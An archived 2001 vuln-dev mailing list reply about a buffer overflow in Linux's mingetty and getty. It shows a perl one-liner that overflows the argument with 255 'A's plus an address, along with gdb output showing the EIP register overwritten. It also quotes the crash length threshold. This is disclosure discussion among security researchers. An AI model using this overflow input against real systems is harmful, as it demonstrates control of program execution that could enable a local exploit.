Vulnerability Development mailing list archives
Re: core dump on mingetty and getty
From: "G . Cohen" <sor () rshell org>
Date: Tue, 4 Dec 2001 01:31:02 +0200
On Mon, Dec 03, 2001 at 05:43:22PM -0200, Nelson Sampaio Araujo Junior wrote:
I've detected it under Mandrake 8.1. Thus, this attack was not able to currupt EIP register, what is a good signal. It screws up EAX and EDX registers.
Not true.
/sbin/mingetty `perl -e 'print "A" x 255, "\x94\x1c\x49\x80"'`
#0 0x80491c94 in ?? ()
(gdb) info registers eip
eip: 0x80491c94 -2142692204
Regards, Nelson Junior nelson () lunenetworks com br nelson () LUNE com br ----- Original Message ----- From: "Ryan Yagatich" <ryany () procyon pantek com> Cc: <vuln-dev () security-focus com> Sent: Monday, December 03, 2001 5:21 PM Subject: Re: core dump on mingetty and getty$ cd ~ $ /sbin/mingetty `perl -e 'print "A" x 275'` $ /sbin/mingetty `perl -e 'print "A" x 276'` Segmentation fault $ uname -a Linux frodo.devel.lab 2.4.7-10 #1 ...
Current thread:
- Can anyone verify a core dump on /sbin/mingetty smackenz (Dec 03)
- core dump on mingetty and getty KF (Dec 03)
- Re: core dump on mingetty and getty Ryan Yagatich (Dec 03)
- Re: core dump on mingetty and getty Nelson Sampaio Araujo Junior (Dec 03)
- Re: core dump on mingetty and getty G . Cohen (Dec 03)
- Re: core dump on mingetty and getty Ryan Yagatich (Dec 03)
- Re: core dump on mingetty and getty Patrick Patterson (Dec 03)
- Re: core dump on mingetty and getty Sean Davis (Dec 03)
- core dump on mingetty and getty KF (Dec 03)
- Re: Can anyone verify a core dump on /sbin/mingetty Pedro Miller Rabinovitch (Dec 03)
- Re: Can anyone verify a core dump on /sbin/mingetty Chip Mefford (Dec 03)
- Re: Can anyone verify a core dump on /sbin/mingetty J.R. Blain (Dec 03)
- Re: Can anyone verify a core dump on /sbin/mingetty KF (Dec 03)
- Re: Can anyone verify a core dump on /sbin/mingetty Chip Mefford (Dec 03)